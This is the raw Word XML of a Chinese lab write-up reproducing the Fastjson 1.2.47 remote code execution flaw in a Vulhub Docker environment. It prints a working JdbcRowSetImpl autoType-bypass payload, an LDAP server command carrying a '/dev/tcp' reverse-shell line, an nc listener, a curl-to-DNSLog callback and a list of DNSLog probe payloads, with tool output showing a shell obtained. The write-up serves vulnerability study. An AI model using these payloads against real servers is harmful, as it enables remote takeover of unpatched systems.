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default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Fastjson 1.2.47 远程命令执行漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>复现</w:t>
      </w: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36"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(By Jean)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30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650"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:eastAsiaTheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2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b/>
              <w:i w:val="0"/>
              <w:caps w:val="0"/>
              <w:color w:val="404040"/>
              <w:spacing w:val="0"/>
              <w:sz w:val="3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b/>
              <w:i w:val="0"/>
              <w:caps w:val="0"/>
              <w:color w:val="404040"/>
              <w:spacing w:val="0"/>
              <w:sz w:val="30"/>
              <w:szCs w:val="30"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              <w:b/>
              <w:i w:val="0"/>
              <w:caps w:val="0"/>
              <w:color w:val="404040"/>
              <w:spacing w:val="0"/>
              <w:sz w:val="30"/>
              <w:szCs w:val="30"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate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_Toc28598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Fastjson简介</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28598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_Toc17156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Vulhub简介</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17156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_Toc22822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Dnslog介绍</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22822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_Toc27209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漏洞原因</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27209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_Toc28984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漏洞复现过程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28984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_Toc20120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方法一</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20120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_Toc15457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5.1.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞环境</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15457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_Toc3062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5.1.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Centos7上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3062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_Toc4696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5.1.3.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_Toc4696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_Toc8187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5.1.4.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_Toc8187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_Toc21543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5.1.5.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_Toc21543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_Toc8726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5.1.6. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Dnslog进行漏洞验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8726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_Toc13283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方法二</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13283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_Toc6879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5.2.1. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞环境</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc6879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_Toc9013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5.2.2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9013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_Toc23299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5.2.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows10上执行操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23299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_Toc26390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5.2.4. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Kali上查看结果</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26390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_Toc30356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漏洞原理</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30356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_Toc615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发起请求</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc615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_Toc28603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远程调用</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28603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_Toc30283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6.3. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>数据转发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30283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_Toc13345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6.4. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>漏洞执行</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13345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begin"/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instrText xml:space="preserve"> HYPERLINK \l _Toc3706 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              <w:i w:val="0"/>
              <w:caps w:val="0"/>
              <w:spacing w:val="0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_Toc3706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  <w:p>
          <w:pPr>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:eastAsiaTheme="minorEastAsia"/>
              <w:i w:val="0"/>
              <w:caps w:val="0"/>
              <w:color w:val="404040"/>
              <w:spacing w:val="0"/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:szCs w:val="30"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              <w:i w:val="0"/>
              <w:caps w:val="0"/>
              <w:color w:val="404040"/>
              <w:spacing w:val="0"/>
              <w:szCs w:val="30"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:eastAsiaTheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:eastAsiaTheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="404040"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc28598"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fastjson简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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Fastjson 是一个 阿里巴巴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开源的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Java 库，可以将 Java 对象转换为 JSON 格式，当然它也可以将 JSON 字符串转换为 Java 对象。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Fastjson 可以操作任何 Java 对象，即使是一些预先存在的没有源码的对象。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Fastjson 源码地址：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instrText xml:space="preserve"> HYPERLINK "https://github.com/alibaba/fastjson" \t "https://www.runoob.com/w3cnote/_blank"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https://github.com/alibaba/fastjson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end"/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Fastjson 中文 Wiki：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instrText xml:space="preserve"> HYPERLINK "https://github.com/alibaba/fastjson/wiki/Quick-Start-CN" \t "https://www.runoob.com/w3cnote/_blank"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https://github.com/alibaba/fastjson/wiki/Quick-Start-CN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17156"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Vulhub简介</w:t>
      </w:r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t>Vulhub是一个基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="F44336"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>docker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t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorEastAsia"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="F44336"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>docker-compose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t>的漏洞环境集合，进入对应目录并执行一条语句即可启动一个全新的漏洞环境，让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理本身。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4A4A4A"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>官网：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instrText xml:space="preserve"> HYPERLINK "https://vulhub.org/"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t>https://vulhub.org/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A4A4A"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF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2822"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Dnslog介绍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DNSLog是四叶草安全所属的BugscanTeam打造的一个单独的DNS解析记录和HTTP访问记录的工具。dnslog注入也可以称之为dns带外查询，是一种注入姿势，可以通过查询相应的dns解析记录，来获取我们想要的数据。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27209"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞原因</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/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Fastjson 1.2.47 这个版本没有com.sun.jndi.rmi.object.trustURLCodebase的限制，所以才导致了这个漏洞，具体分析可以参考文章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instrText xml:space="preserve"> HYPERLINK "https://www.freebuf.com/vuls/208339.html"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https://www.freebuf.com/vuls/208339.html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4A4A4A"/>
          <w:spacing w:val="6"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA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28984"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞复现过程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20120"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法一</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc15457"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞环境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19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0"/>
        <w:gridCol w:w="1862"/>
        <w:gridCol w:w="1682"/>
        <w:gridCol w:w="2138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1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="169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Java环境（java -version）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攻击机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Kali（VM虚拟机、NAT模式）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192.168.96.129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 version 4.19.0-kali4-amd64 (devel@kali.org) (gcc version 8.3.0 (Debian 8.3.0-2)) #1 SMP Debian 4.19.28-2kali1 (2019-03-18)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version "11.0.3" 2019-04-16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Runtime Environment (build 11.0.3+1-Debian-1)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64-Bit Server VM (build 11.0.3+1-Debian-1, mixed mode, sharing)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Centos7（VM虚拟机、NAT模式）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CentOS Linux release 7.6.1810 (Core) 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version "1.8.0_181"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Runtime Environment (build 1.8.0_181-b13)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64-Bit Server VM (build 25.181-b13, mixed mode)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Burpsuite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使用主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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172.20.10.8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2004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"1.8.0_211"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1.8.0_211-b12)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25.211-b12, mixed mode)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_Toc3062"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Centos7上执行操作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1、下载vulhub漏洞环境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302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clone https://github.com/vulhub/vulhub.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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安装docker、docker-compose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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进入fastjson 1.2.47的目录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我这里是/root/vulhub-master/fastjson/1.2.47-rce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3700" cy="88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build &amp;&amp; docker-compose up -d启动漏洞环境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访问漏洞环境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"http://192.168.96.128:8090/"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http://192.168.96.128:8090/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91000" cy="1758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" w:name="_Toc4696"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上执行操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/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下载漏洞利用工具fastjson_rce_tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both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instrText xml:space="preserve"> HYPERLINK "https://github.com/wyzxxz/fastjson_rce_tool" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://github.com/wyzxxz/fastjson_rce_tool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22850" cy="1244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开启LDAP服务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-cp fastjson_tool.jar fastjson.HLDAPServer 192.168.96.129 80 "bash=/bin/bash -i &gt;&amp; /dev/tcp/192.168.96.129/4444 0&gt;&amp;1"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016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</w:rPr>
        <w:t>bash=/bin/bash -i &gt;&amp; /dev/tcp/192.168.96.128/4444 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为获取反弹shell的命令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（可参考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"https://blog.csdn.net/alex_seo/article/details/103393052"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https://blog.csdn.net/alex_seo/article/details/103393052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3、开启nc监听端口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 -nlvp 4444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38450" cy="4762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bookmarkStart w:id="9" w:name="_Toc8187"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Windows10上执行操作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在Windows10的Burpsuite中执行以下请求：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186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{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.96.129:80/Object","autoCommit":true}}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03073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bookmarkStart w:id="10" w:name="_Toc21543"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上查看结果</w:t>
      </w:r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Payload发送成功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root@kali:~/fastjson_rce_tool# java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.96.129 80 "bash=/bin/bash -i &gt;&amp; /dev/tcp/192.168.96.129/4444 0&gt;&amp;1"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[-] payload:  {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.96.129:80/Object","autoCommit":true}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[-] payload:  {"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.96.129:80/Object","autoCommit":true}}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[-] LDAP Listening on 0.0.0.0:80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[*] Send LDAP reference result for Object redirecting to http://192.168.96.129:80/Object.class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[*] Have connection from /192.168.96.128:57340 /Object.class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[-] remote target jdk version: java/1.8.0_102, use payload version: jdk8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[-] send payload done and exit.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686435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2、Nc界面成功获取到shell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5950" cy="29146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" w:name="_Toc8726"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Dnslog进行漏洞验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/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>fastjson_tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具验证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1、获取dnslog解析域名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695575"/>
            <wp:effectExtent l="0" t="0" r="317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2、提交命令执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java -cp fastjson_tool.jar fastjson.HLDAPServer 192.168.96.12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80 "curl dhb8tq.dnslog.cn"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0500" cy="734695"/>
            <wp:effectExtent l="0" t="0" r="0" b="19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burpsuite请求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186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{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.96.129:80/Object","autoCommit":true}}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dnslog获取命令执行（curl dhb8tq.dnslog.cn）结果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598420"/>
            <wp:effectExtent l="0" t="0" r="9525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4、fastjson_rce_tool看到成功执行payload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332230"/>
            <wp:effectExtent l="0" t="0" r="10795" b="127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Burpsuite验证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使用以下请求快速验证：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66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{"zeo":{"@type":"java.net.Inet4Address","val":"tpj10e.dnslog.cn"}}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865630"/>
            <wp:effectExtent l="0" t="0" r="8890" b="127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Dnslog收到返回：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838450"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635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常见payload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{"@type":"java.net.Inet4Address", "val":"dnslog"}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{"@type":"java.net.Inet6Address", "val":"dnslog"}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{"@type":"java.net.InetSocketAddress"{"address":, "val":"dnslog"}}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{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}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{{"@type":"java.net.URL", "val":"dnslog"}:"aaa"}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Set[{"@type":"java.net.URL", "val":"dnslog"}]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Set[{"@type":"java.net.URL", "val":"dnslog"}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{{"@type":"java.net.URL", "val":"dnslog"}:0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13283"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法二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此方法使用方法一的环境未成功，经查找原因，是jdk版本原因导致，故将攻击机（kali）的jdk版本进行更换。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6879"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="19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0"/>
        <w:gridCol w:w="1862"/>
        <w:gridCol w:w="1682"/>
        <w:gridCol w:w="2138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40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1862" w:type="dxa"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p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版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="169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Java环境（java -version）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攻击机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Kali（VM虚拟机、NAT模式）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192.168.96.129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 version 4.19.0-kali4-amd64 (devel@kali.org) (gcc version 8.3.0 (Debian 8.3.0-2)) #1 SMP Debian 4.19.28-2kali1 (2019-03-18)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"1.8.0_191"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1.8.0_191-b12)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25.191-b12, mixed mode)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1862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Centos7（VM虚拟机、NAT模式）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CentOS Linux release 7.6.1810 (Core) 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version "1.8.0_181"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Runtime Environment (build 1.8.0_181-b13)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OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)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Burpsuite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使用主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1862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172.20.10.8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2004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1698" w:type="dxa"/>
          </w:tcPr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version "1.8.0_211"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Java(TM) SE Runtime Environment (build 1.8.0_211-b12)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 HotSpot(TM) 64-Bit Server VM (build 25.211-b12, mixed mode)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9013"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali上执行操作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1、下载漏洞利用工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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instrText xml:space="preserve"> HYPERLINK "https://github.com/CaijiOrz/fastjson-1.2.47-RCE.git" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://github.com/CaijiOrz/fastjson-1.2.47-RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="16"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="宋体" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.git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6"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
